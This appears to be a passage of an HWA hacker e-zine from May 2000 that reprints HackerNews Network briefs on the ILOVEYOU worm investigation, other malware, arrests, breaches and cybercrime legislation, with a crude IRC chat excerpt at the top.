                           / ___|| |_ __ _ _ __| |_
                           \___ \| __/ _` | '__| __|
                            ___) | || (_| | |  | |_
                           |____/ \__\__,_|_|   \__|
                           
                           
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   
                                

             
     ".. since we incorporated, we can proudly say,'Now with 20% more shit!'"
       
       
       
     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   
       
       In the land of the snivelling wotsits lay the honourable creed musers ...
       
       
       #fuckmedead
       
       [15:36] <FPatWORK> hrmm
       [15:37] <FPatWORK> dont want to go over there (pointing to office with Don, Ralph and Norman)
       [15:38] <FPatWORK> c'mon ask me why
       [15:38] <FPatWORK> damnit
       [15:38] <Cruciphux> why              
       [15:38] <Cruciphux> computer talk!?!?
       [15:38] <FPatWORK> no, they're talking about pornos
       [15:38] <FPatWORK> rofl
       [15:38] <Cruciphux> ugh 
       [15:39] <Cruciphux> "fuck pornos"
       [15:39] <Cruciphux> hey thats a quotable quote
       [15:39] <FPatWORK> heh
       [15:40] <FPatWORK> S.A.U.N.A.
       [15:40] <Cruciphux> you too can now own your own ANUSTICK (c)
       [15:40] <FPatWORK> Society Against the Use of Needless Acronyms
       [15:41] <Cruciphux> "hey bob, is that a stick up your ass?"
       [15:41] <Merxorcst> haha
       [15:41] <Cruciphux> "Why, yes it is!"
       [15:41] <FPatWORK> thats (c)(tm)(r) me
       [15:42] <Cruciphux> get your very own ANUSTICK for only $19.95
       <snip>
      	                  
       ...                    
      
      
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=    
      -= start =--= start =--= start =--= start =--= start =--= start =--= 
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   
      
      
     
 03.0 [HNN] May 09'00 ILOVEYOU Investigation Continues 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   
      contributed by Lots of people
      Experts Say Police Got Wrong Suspects
      Two computer virus experts have come forward and said that they do not
      believe that the couple in Manila currently under investigation for
      their role with the ILOVEYOU virus/worm are in fact the authors of the
      code. James Atkinson from the Granite Island Group feels that the true
      author is Anjabi, a 15 to 17 year old girl who lives near the current
      suspects.
      
      Wired
      
      Suspect Ordered Released
      The 27-year-old bank employee that has been arrested in connection
      with The ILOVEYOU virus/worm has been released. Reonel Ramones had
      been arrested and charged with violating the Access Devices Regulation
      Act. Police, however, have not been able to compile enough evidence to
      hold the man, forcing them to let him go pending the collection of more
      evidence. He will still be forced to appear in court on May 19 to
      answer the preliminary charges.
      
      Reuters - via Yahoo
      
      Manila Police Now Looking for 10 Suspects
      Philippine police said that they are now looking for up to ten people
      who may have had access to computers at the AMA Computer College. The
      couple currently under investigation has attended the college in the
      past.
      
      Reuters - via Yahoo
      
      http://www.wired.com/news/politics/0,1283,36203,00.html
      http://dailynews.yahoo.com/h/nm/20000509/ts/virus_philippines_13.html
      http://dailynews.yahoo.com/h/nm/20000509/ts/virus_philippines_10.html
      ----------
      
 04.0 [HNN] May 09'00 Brace Yourselves For the SuperVirus 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      While this article is sensationalistic, full of hype and FUD, it does
      make an important point. ILOVEYOU was not as bad as it could have
      been. Just think if it was targeted against other types of files, .exe
      for instance. Or if it had been an auto executable with no user
      intervention required?
      
      London Observer
      
      http://shns.scripps.com/shns/story.cfm?pk
      ----------
      
 05.0 [HNN] May 09'00 NIPC Accused of Dragging Feet 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Brian 
      The National Infrastructure Protection Center was criticized for
      overreacting to the recent 911 virus that had minimal impact and now
      is being criticized again for not reacting strongly enough to ILOVEYOU.
      Sen. Robert Bennett, R-Utah wants to investigate whether NIPC's
      response was quick enough.
      
      Newsbytes
      NIPC - Latest Advisory
      
      http://www.newsbytes.com/pubNews/00/148613.html
      http://www.nipc.gov/nipc/alert00-041e.htm
      @HWA
      
 06.0 [HNN] May 09'00 Classified Systems Hit 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      ILOVEYOU somehow managed to jump the air gap and infected at least
      four Department of Defense classified systems. DoD said that the
      infection was quickly quarantined and that The Joint Task Force on
      Computer Network Defense will be investigating how the classified
      systems became infected.
      
      Government Executive Magazine
      
      http://www.govexec.com/dailyfed/0500/050800j1.htm
      @HWA
      
 07.0 [HNN] May 09'00 Mitnick in Online Chat 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      contributed by apocalyse 
      Despite being banned from touching a computer or anything connected to
      the Internet for three years, Kevin Mitnick was able to participate in
      an online chat with ABC News. The topic of discussion was of course
      the ILOVEYOU virus/worm.
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/chat_000508mitnick.html
      @HWA
      
 08.0 [HNN] May 09'00 Phreakers In the White House 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by major 
      The FBI is conducting an investigation into whether the White House
      phone system has been breached. The breach may have involved the "real
      time" interception of telephone conversations. The FBI has been
      investigating Amdocs, a Chesterfield Mo., telecommunications billing
      company who assisted Bell Atlantic with installing telephone lines at
      the White House in 1997. The FBI has tried to get an arrest warrant
      for a suspect; however, a senior law enforcement official told Fox News
      that "to suggest that the phones at the White House have been
      penetrated is not supported by the facts."
      
      Fox News
      
      http://www.foxnews.com/national/050500/phonebreach.sml
      @HWA
      
 09.0 [HNN] May 09'00 MS vs Netscape in Blame for Security Hole 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopolyse
      Microsoft and Netscape Communications are pointing fingers at each
      other over a browser-related security problem that neither company has
      any intention of fixing. (Do I have to say more?)
      
      C|Net
      
      http://news.cnet.com/news/0-1005-200-1820959.html?tag
      @HWA
      
 10.0 [HNN] May 09'00 Hacker vs. Cracker The Debate Continues 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Weld Pond 
      Blair Shewchuk, a journalist with the Canadian Broadcasting Company,
      has published a really good treatise on why media outlets continue to
      use the word 'hacker' instead of 'cracker' or some other alternative.
      While he may be correct in that you can not force people to use
      different words or change their meanings in the dictionary you can
      send a hell of a lot of emails. (Personally we prefer the word
      attacker or criminal, much less confusion with that.)
      
      Canadian Broadcasting Company
      
      http://cbc.ca/news/indepth/words/hack.html
      @HWA
 
 11.0 [HNN] May 10'00 Buffer Overflow: The Name Game: Groking the Love Bug 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   
   
      
      contributed by McIntyre 
      The media frenzy surrounding the ILOVEYOU or 'Love Bug' virus/worm has
      resulted in several contradictions within the press. Even the
      National Bureau of Investigation can't seem to get its facts
      straight. Things like names, relationships, and damage estimates would
      seem to be pretty standard and easy things to report on, or are they?
      McIntyre takes a look at these questions and more in the latest
      article in the Buffer Overflow.
      
      Buffer Overflow
      
      @HWA
      
 12.0 [HNN] May 10'00 New Virus/Worm On The Loose, Friendmess.A 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Space Rogue 
      While based on ILOVEYOU, Friendmess.A is different enough to be
      considered a separate entity and not a variant. After infection,
      the Friendmess virus/worm will delete files from the Windows
      directory including Windows/System and Windows/Temp. While the danger
      from Friendmess is high, it is not spreading as fast as ILOVEYOU.
      
      ZD Net
      
      http://www.zdnet.com/zdhelp/stories/main/0,5594,2566037,00.html
      @HWA
      
 13.0 [HNN] May 10'00 YTCracker Busted For Web Defacement 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by ytcracker 
      YTCracker has been arrested and charged with one count each of
      computer crime and criminal mischief for defacing the web site of the
      city of Colorado Springs last October. The two felony charges carry a
      maximum penalty of two years of juvenile detention.
      
      The Gazette
      Attrition.org - Mirrors of YTCrackers Defacements
      
      http://www.gazette.com/daily/top3.html
      http://www.attrition.org/mirror/attrition/ytcracker.html
      @HWA
      
 14.0 [HNN] May 10'00 Gov Security Laws Introduced At Summit 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Senator Fred Thompson (R-Tennessee) has introduced legislation that
      would require the federal government to conduct yearly checks of the
      security of its computer systems and force managers of those systems
      to prove they are secure. The Government Information Security Act was
      introduced at the Internet Defense Summit and was approved by the
      Government Affairs Committee Tuesday.
      
      Wired
      
      http://www.wired.com/news/politics/0,1283,36223,00.html
      @HWA
      
 15.0 [HNN] May 10'00 Internet Fraud Complaint Center Launched By DoJ 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench and acopalyse 
      Janet Reno has announced the creation of The Internet Fraud Complaint
      Center, a joint venture launched by the FBI and National White Collar
      Crime Center. The new center will be aimed at providing better
      coordination among law enforcement agencies in tackling complaints of
      fraud on the Internet.
      
      Government Executive Magazine
      E Commerce Times
      Internet Fraud Complaint Center
      
      http://www.govexec.com/dailyfed/0500/050900b1.htm
      http://www.ecommercetimes.com/news/articles2000/000509-3.shtml
      https://www.ifccfbi.gov/
      @HWA
      
 16.0 [HNN] May 10'00 And Yet Another Hole Found In Hotmail 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalypse Dow 
      If a Hotmail user clicks on an attachment that contains a Javascript
      Trojan horse, an attacker can read, send, and delete messages from
      that person's account. Microsoft said that they would look into the
      issue and issue a fix if needed.
      
      Wired
      
      http://www.wired.com/news/technology/0,1282,36241,00.html
      @HWA
      
      
 17.0 [HNN] May 11'00 Solar Sunrise, Now on Video 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by yeza 
      Solar Sunrise, the code name for what was once described as "the most
      organized and systematic attack the Pentagon has seen to date" is now
      out on video. A training tape produced by National Infrastructure
      Protection Center is now available for $12.28 from FilmComm. But read
      the review first. (Our tax dollars hard at work making videos of a
      couple of punk kids.)
      
      ZD Net - Scathing Solar Sunrise Review
      FilmComm
      
      http://www.zdnet.com/intweek/stories/columns/0,4164,2567361,00.html
      http://www.filmcomm.com
      @HWA
      
 18.0 [HNN] May 11'00 Network Manager Sent to Jail For Destroying His Network 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by McIntyre 
      In the first federal criminal prosecution of computer sabotage a
      network manager, who spent ten and a half years building the network,
      was found guilty of destroying what he had built. Tim Lloyd, 37, of
      Wilmington, Del. had deleted all the files that controlled the
      company's manufacturing process three weeks after he had been fired.
      Omega Engineering, a high-tech measurement and instrumentation
      manufacturer, has estimated that it lost more than $10 million. Mr.
      Lloyd could face at least five years in federal prison; sentencing has
      been scheduled for July 31.
      
      The Industry Standard
      
      http://www.thestandard.com/article/display/0,1151,14938,00.html
      @HWA
      
 19.0 [HNN] May 11'00 Lawmakers Upset Over ILOVEYOU 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Kevin 
      In a hearing on Wednesday the House Science Committee's panel on
      technology criticized the Anti-Virus industry for failing to protect
      the nation against the ILOVEYOU virus/worm. During the hearing
      Congressman Gutknecht said he was contemplating drafting a bill that
      would make it illegal for software companies to hire former hackers.
      Peter Tippett, chief scientist at Virginia-based computer security
      assurance firm ICSA.net went so far as to suggest that the mere act of
      writing a virus should be made illegal. (And so the hysteria begins.)
      
      Security Focus
      
      http://www.securityfocus.com/news/32
      @HWA
      
 20.0 [HNN] May 11'00 Intel Motherboards Could Destroy Files 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Code Kid
      Intel has admitted that nearly one million motherboards, that have
      shipped since November, may have a defective 'memory translator hub'
      that could experience problems in transferring data between the SDRAM
      and the 820 Intel processor. Intel said that the defect could cause
      some systems to intermittently reset, reboot, hang or possibly cause
      data corruption. The motherboards have been shipped to numerous
      suppliers including Dell and Compaq as well as third party
      manufacturers. Intel has said it will replace the defective parts but
      urges customers to contact their dealer.
      
      Nando Times
      C|Net
      
      http://www.nandotimes.com/technology/story/body/0,1634,500202708-500280641-501498167-0,00.html
      http://news.cnet.com/news/0-1006-201-1851632-0.html?tag
      @HWA
      
 21.0 [HNN] May 11'00 Hackers and the Tools They Use 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Crypt0pimP 
      So what should you get out of your $150,000 penetration test? Someone
      fresh out of school who knows how to run ISS and that is it? Or should
      you be getting a more thorough test of your network?
      
      SunWorld
      
      http://www.sunworld.com/sunworldonline/swol-05-2000/swol-05-security.html
      @HWA
      
      
 22.0 [HNN] May 11'00 HackerNews Brazil and SecureNet Forced To Remove Content 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no 
      The web site http://www.hackernews.com.br and Secure Net, also based
      in Brazil, have been forced to remove their defaced page archives.
      Brazil's legal system decided that the defacement mirror archives
      hosted on the sites were an incentive to criminal activity and forced
      them to be removed.
      
      Terra - Portuguese
      
      http://www.terra.com.br/informatica/2000/05/09/021.htm
      @HWA
      
 23.0 [HNN] May 12'00 ILOVEYOU May Have Been An Accident 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      A Filipino computer student has admitted that he may have been the
      one who released the ILOVEYOU virus/worm but that it was an accident.
      However, he would not admit to writing the virus. Investigators have
      said they want to talk with Onel A. de Guzman but declined to
      identify him as a suspect.
      
      Nando Times
      
      http://www.nandotimes.com/technology/story/body/0,1634,500203055-500281301-501504037-0,00.html
      @HWA
      
 24.0 [HNN] May 12'00 Windows Labeled 'Virus Friendly' 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Experts are criticizing Microsoft for making software that has
      features that few people want or need but that make it extremely easy
      for viruses to spread. Windows Scripting Host and Visual Basic are two
      of the features named that come standard with every installation that
      assist if not promote the spread of malicious code.
      
      The Industry Standard
      
      http://www.thestandard.com/article/article_print/1,1153,15019,00.html
      @HWA
      
      
 25.0 [HNN] May 12'00 PBS Looses Subscriber Info 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by sean.o 
      The Public Broadcasting System based in Lewiston Maine, suffered an
      electronic intrusion into its billing system. Officials have said that
      they do not know if any of the personal information, including names,
      phone numbers, addresses and credit card numbers of its 63,000 radio
      and television members had even been looked at let alone copied and
      downloaded. The station said that it is warning its members just in
      case.
      
      Associated Press - San Jose Mercury News
      
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/58851l.htm
      @HWA
      
 26.0 [HNN] May 12'00 Anonymous User Sues Yahoo For Releasing Identity 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Space Rogue
      After having his identity revealed to AnswerThink Consulting an
      anonymous user is suing Yahoo for not notifying him that his identity
      had been revealed. The civil suit charges Yahoo, Inc., with invasion
      of privacy, breach of contract, negligent misrepresentation, and
      unfair competition and false advertising. Yahoo revealed the names of
      several posters to an AnswerThink message board after being
      subpoenaed. The user, known as 'Aquacool_2000' is being supported by
      ACLU and EPIC.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2567806,00.html
      @HWA
      
 27.0 [HNN] May 12'00 Smart Cards Labeled Secure 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      On May 5th the National Institute of Standards and Technology issued a
      (FIPS) Pub 140-1 certification to the Spyrus Rosetta Smart Card.
      This is the first smart card to receive such certification. The
      certification makes this card eligible to participate in the GSA's $1
      Billion government-wide smart card contract.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0508/web-fips-05-11-00.asp
      @HWA
      
 28.0 [HNN] May 12'00 Cyber Attackers on Television 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by PhantasmP 
      This Saturday (May 13th) America's Most Wanted is airing an episode
      about cyber terrorism. The write up in the print edition of TV Guide
      is as follows: "Examining U.S. government efforts to stop criminal
      computer hackers, who can disrupt vital city services." The online
      edition says "Cyber-Criminals Special Edition: An overview of cyber
      terrorism includes easy targets; wide-ranging effects; and a profile
      of a dangerous hacker." The show is scheduled to air at 9pm EST on FOX
      Networks. (Like this won't be full of FUD.)
      
      TV Guide
      America's Most Wanted
      
      http://www.tvguide.com/listings/index.asp?view
      http://www.amw.com/site/thisweek/index.html
      @HWA
 
 29.0 [HNN] May 15'00 Love Bug Suspect Denies All 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Brian
      Michael Buen, who has been suspected of writing the ILOVEYOU
      virus/worm has denied all involvement. "I should like to categorically
      state for the record that I have no involvement or participation
      whatsoever in the design, development, creation or dissemination of
      the 'ILOVEYOU' virus," Buen said in a statement.
      
      Associated Press - San Jose Mercury News
      ZD Net
      
      http://www.mercurycenter.com/svtech/news/breaking/ap/docs/67301l.htm
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2569390,00.html?chkpt
      @HWA
      
 30.0 [HNN] May 15'00 Microsoft Found to Be Threat to National Security 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Cult hero 
      A two part essay that explains why Microsoft is bad for the country
      has been posted. The first part focuses on the serious security
      shortcomings of Windows while part 2 focuses on the laws the software
      industry has passed to protect themselves from any liability.
      
      InfoWarrior
      
      Microsoft Criticism Mounts
      After Melissa, Microsoft had over a year to address security concerns
      about the tight integration of its email client with other parts of
      its operating system. Now system administrators are criticizing the
      company for letting the problem grow out of hand instead of attempting
      to minimize the potential threat.
      
      ZD Net
      
      http://www.infowarrior.org/articles.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2568904,00.html
      @HWA
      
 31.0 [HNN] May 15'00 G8 to Discuss Cybercrime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime 
      The Group of Eight (G8) will meet in Paris today for a three day
      discussion about the increasing threat of online crime.
      
      ZD Net
      APB Online
      BBC
      
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2569395,00.html?chkpt
      http://www.apbnews.com/newscenter/internetcrime/2000/05/14/netcrime0514_01.html
      http://news.bbc.co.uk/hi/english/world/europe/newsid_748000/748597.stm
      @HWA
      
 32.0 [HNN] May 15'00 VA Described as Wide Open To Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      An internal memo circulating within the Veterans Administration has
      listed 18 different vulnerabilities in computer systems at the
      organization. VA computer security is said to be so weak that it
      continues to be a target for attack. The VA spends $1 Billion of
      taxpayers' money per year on computer systems.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0508/web-va-05-12-00.asp
      @HWA
      
 33.0 [HNN] May 15'00 Bank Web Site Breached 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by weknowu 
      The web site of the Saraswat co-operative bank in India was breached
      by a group of attackers who claimed they were testing its security.
      The attackers gained access to customer account information but were
      unable to initiate any online transactions. Bank officials have said
      that they have closed the security hole.
      
      Times Of India
      
      http://www.timesofindia.com/120500/12mpun3.htm
      @HWA
      
      
 34.0 [HNN] May 15'00  Koreans Host 'Hacking Contest' 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The Korea Advanced Institute of Science and Technology (KAIST) will
      hold an international hacking contest from June 27 to the 30th. A
      prize of $50,000 will be awarded for the top finisher, and $20,000 and
      $10,000 to the second- and third-place finishers, respectively.
      (Another lame attempt at publicity, these contests do nothing to test
      security or gain information.)
      
      Korea Herald
      Korea Advanced Institute of Science and Technology
      
      http://www.koreaherald.co.kr/news/2000/05/__10/20000515_1023.htm
      http://www.kaist.ac.kr/edex.html
      @HWA
      
 35.0 [HNN] May 15'00 America's Most Wanted Hit with DoS 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by sleestack 
      After lumping hackers in with murderers and serial rapists the web site
      for America's Most Wanted became unreachable. Experts theorize that
      the site came under a heavy denial of service attack after airing a
      segment on cyber-crime which asked users to phone in tips on the
      recent attacks that hit Yahoo, CNN, and others.
      
      Security Focus
      America's Most Wanted
      
      http://www.securityfocus.com/news/34
      http://www.amw.com
      @HWA
      
 36.0 [HNN] May 15'00 Greisling Responds 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by David 
      Chicago Tribune columnist David Greising published a scathing article
      on hackers last week that said we should all be locked up as
      criminals. This week he responds in a slightly calmer tone. (At least
      he substituted the word cybervandal once in this week's column. Not
      much but a start.)
      
      Hackers Hardly Huggable; Let's Get Serious - May 7
      Hackers weigh in, and are they ... uh ... hacked off - May 14
      
      Mr. Greising included some carefully chosen statements out of the
      emails that he received for his article. HNN received a few of those
      same emails which we publish here in their entirety.
      
      Letters to David Greising
      
      http://www.chicagotribune.com/business/columnists/greising/0,1122,SAV-0005070041,00.html
      http://chicagotribune.com/business/columnists/greising/
      @HWA
      
 
 37.0 [HNN] May 17'00 Microsoft Security Spanked Again 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by turtlex 
      Microsoft Office 2000 ships with an ActiveX control named "Microsoft
      Office UA Control". Most users probably recognize it as the sickeningly
      friendly little paper clip character that makes annoying noises and
      faces at you while you work. It is installed by default and is
      categorized as being "safe for scripting" which could allow an
      attacker to write a script that would allow them to do anything on the
      victim's computer including deleting files.
      
      ZD Net
      Fairfax IT
      @stake L0pht Labs - Advisory
      Microsoft - Patch
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2570727,00.html
      http://www.it.fairfax.com.au/breaking/20000515/A62291-2000May15.html
      http://www.l0pht.com/advisories/msoua.txt
      http://www.microsoft.com/technet/security/bulletin/ms00-034.asp
      @HWA
      
 38.0 [HNN] May 17'00 Canada's Big Brother Revealed 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by pyr8 
      Canada's federal Privacy Commissioner, Bruce Phillips, has revealed a
      massive computerized database that contains volumes of personal data
      on 33.7 million Canadians, living and dead. The database was started
      fifteen years ago by the Office of Employment and Immigration and is
      used to research and evaluate the effectiveness of the federal
      employment insurance program. The database contains information
      regarding tax returns, child tax benefits, provincial and municipal
      welfare files, federal jobs, job training and other information. There
      are proposals to expand the database to include additional data on
      social assistance recipients from provinces and territories, the
      Canada Student Loan Program, the Canada Pension Plan and Old Age
      Security Program.
      
      Ottawa Citizen
      
      http://www.ottawacitizen.com/national/000517/4116449.html
      @HWA
      
      
 39.0 [HNN] May 17'00 Code on Disk Points Finger At Suspect 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      A disk taken from the home of Onel A. de Guzman contains a copy of a
      different virus that bears a striking resemblance to the ILOVEYOU
      virus/worm. According to the National Bureau of Investigation this new
      virus was written by Michael Buen. Mr. Buen has denied any and all
      involvement in the case.
      
      Associated Press - via Yahoo
      
      http://dailynews.yahoo.com/h/ap/20000516/tc/computer_love_bug_74.html
      @HWA
      
      
 40.0 [HNN] May 17'00 List of ILOVEYOU Suspects Grows 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Authorities are now looking at over 40 people as possible authors of
      the recent ILOVEYOU virus/worm. Most of the suspects are students at
      Manila's Amable Mendoza Aguiluz Computer College.
      
      Industry Standard - via Yahoo
      
      http://dailynews.yahoo.com/h/is/20000516/bs/list_of_love_bug_suspects_grows_1.html
      @HWA
      
      
 41.0 [HNN] May 17'00 Return of the Phreaker 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      This article uses a few scare tactics but obviously when connecting
      telephone and network systems together it is imperative to ensure that
      adequate security controls are in place. Some experts theorize that
      soon Phreakers will need to penetrate the Internet to access phone
      systems. A complete reversal of roles from when it was the computer
      underground that needed access to the phone systems to access
      computers.
      
      Wired
      
      http://www.wired.com/news/business/0,1367,36309,00.html
      @HWA
      
 42.0 [HNN] May 17'00 Hope 2000 Announces Plans 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Macki 
      HOPE 2000 has announced a mock DeCSS trial and that they are currently
      recruiting DJs and bands. They will soon announce the speaker list. In
      an interesting side development the real DeCSS trial date has been
      moved to the Monday after h2k.
      
      HOPE 2000
      
      http://www.h2k.net/
      @HWA
      
 43.0 [HNN] May 17'00 More and more E-zines 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Kynik 
      Issue 5 of the Napalm e-zine has been released, covering contemporary
      telenet, ethernet, music reviews, and various reader questions and
      comments. Forbidden Knowledge has released FK-11.
      
      Napalm
      Forbidden Knowledge - Official Distribution Site
      
      http://napalm.firest0rm.org/
      http://www.effkay.za.net
      @HWA
      
 
 44.0 [HNN] May 18'00  UCITA May Help Computer Attackers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      The Uniform Computer Information Transactions Act (UCITA) has been
      accused of giving computer attackers backdoor access into computer
      systems. The law allows software manufacturers to install backdoors
      into the software so that they can control licensing agreements.
      Experts fear that these backdoors will be exploited by criminals who
      are looking to cause havoc.
      
      BBC
      
      http://news.bbc.co.uk/hi/english/sci/tech/newsid_752000/752180.stm
      @HWA
      
      
  45.0 [HNN] May 18'00  H.R.3489 To Limit Eavesdropping 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by evenprime 
      The House Commerce Committee has voted to make it a crime to sell
      anything that can decode PCS cellular, pager traffic, or encrypted
      radio transmissions for the purposes of unauthorized interception. The
      ban was quietly attached to a tax harmonization bill as an amendment
      to the Communications Act of 1934. The bill, known as the Wireless
      Telecommunications Sourcing and Privacy Act, is expected to go before
      the Senate soon. (Instead of fixing the protocol let's just make it
      illegal.)
      
      Wired
      H.R.3489
      
      http://www.wired.com/news/politics/0,1283,36401,00.html
      http://thomas.loc.gov/cgi-bin/bdquery/z?d106:h.r.03489:
      @HWA
      
      
 46.0 [HNN] May 18'00 Congressional Records Reveals Officers Social Security Numbers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Arik 
      Using public information found on military web sites a New Jersey man
      has admitted that he created fake credit card accounts for some of the
      nation's highest-ranking military officers. Lamar Christian, of
      Trenton, N.J., said he got the information including social security
      numbers from a web site. The owner of the web site says he got them
      from the Congressional Record where the numbers used to be published
      when an officer was promoted. Christian is scheduled to be sentenced
      on August third and could face up to four years in jail.
      
      Associated Press - via ABC News
      
      http://abcnews.go.com/wire/US/ap20000517_684.html
      @HWA
      
      
 47.0 [HNN] May 18'00 G8 Finds No Quick Fix For Cyber Crime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      While meeting in Paris, the world's industrialized countries said they
      wanted faster and more specialized responses to online crime but at
      the same time did not want to hurt online economic growth. The group
      stressed cooperation, not only between countries but between
      government, law enforcement, and corporations. They plan to meet again
      on the topic in July.
      
      Reuters - via Wired
      Associated Press - via USA Today
      Industry Standard - via Yahoo
      
      http://www.wired.com/news/politics/0,1283,36398,00.html
      http://www.usatoday.com/life/cyber/tech/cth930.htm
      http://dailynews.yahoo.com/h/is/20000517/bs/group_unveils_net-security_recommendations_1.html
      @HWA
      
 48.0 [HNN] May 18'00 Philippines Has No CyberCrime Law - Suspect Can Not be Prosecuted 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
